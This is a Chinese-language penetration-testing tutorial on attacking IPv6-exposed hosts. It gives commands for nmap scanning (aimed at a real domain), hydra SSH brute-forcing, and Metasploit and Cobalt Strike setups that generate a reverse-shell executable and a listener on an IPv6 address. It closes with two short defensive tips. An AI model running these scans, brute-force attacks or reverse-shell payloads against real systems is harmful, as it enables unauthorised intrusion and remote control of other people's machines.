渗透测试中针对IPV6的攻击和利用

admin 2024年12月18日10:07:39评论40 views字数 927阅读3分5秒阅读模式

随着IPv6网络的普及。极大地方便了我们的工作。但同时也带来了相对隐藏的安全隐患。因此,本文从攻击者的角度演示IPv6在渗透测试中的利用,和如何防范相应的安全措施。

信息收集及利用

如何获取IPv6地址?相对IPv4、ipv6更长、更不容易记忆,且随时发生变化。因此很多人觉得自己很“安全”。

为了方便自己,我们常将ipv6地址解析到域名。而这也为安全埋下了隐患。

因此,我们可以通过ping域名的形式获取对方的IP地址。如下:

渗透测试中针对IPV6的攻击和利用
利用ping可以获取ipv6地址

端口扫描

同样,我们可以利用nmap命令对目标进行端口扫描。

nmap -6 -T4 -A baidu.com

其中-6 指明该目标为ipv6目标。

渗透测试中针对IPV6的攻击和利用

如上,我们扫描得到,系统类型为Debian。分别开启常见的22 80 3306等端口。有些大佬在本地环境中部署程序时,为了方便自己喜欢用弱口令,而这也对攻击者有了可乘之机!

渗透测试中针对IPV6的攻击和利用
利用弱口令登录qbittorrent下载器

对设备密码破解

可以尝试对主机的22 3306端口进行暴力破解。示例如下:

hydra -L user.txt -P pass.txt -t 10 -o save.log -vV #ipv6地址# ssh
渗透测试中针对IPV6的攻击和利用

IPV6上线Shell

我们在上线Payload时,常常苦于没有公网IP而无法实现跨网段上线设备。而IPV6为我们打开了新的思路。

CS配置

渗透测试中针对IPV6的攻击和利用
新建监听IPV6地址
渗透测试中针对IPV6的攻击和利用
生成payload
渗透测试中针对IPV6的攻击和利用
上线设备

msf配置

很简单,将原来的ipv4地址改成ipv6就行了。

msfconsole
use payload/windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
# 生成shell
generate -f exe -o shell.exe

配置监听

use exploits/multi/handler
set payload windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
exploit
渗透测试中针对IPV6的攻击和利用

安全建议

  • 非必要,请勿将敏感端口暴露在公网环境。
  • 强化密码,定期更新漏洞。

原文始发于微信公众号(kali笔记):渗透测试中针对IPV6的攻击和利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日10:07:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试中针对IPV6的攻击和利用https://cn-sec.com/archives/3522071.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息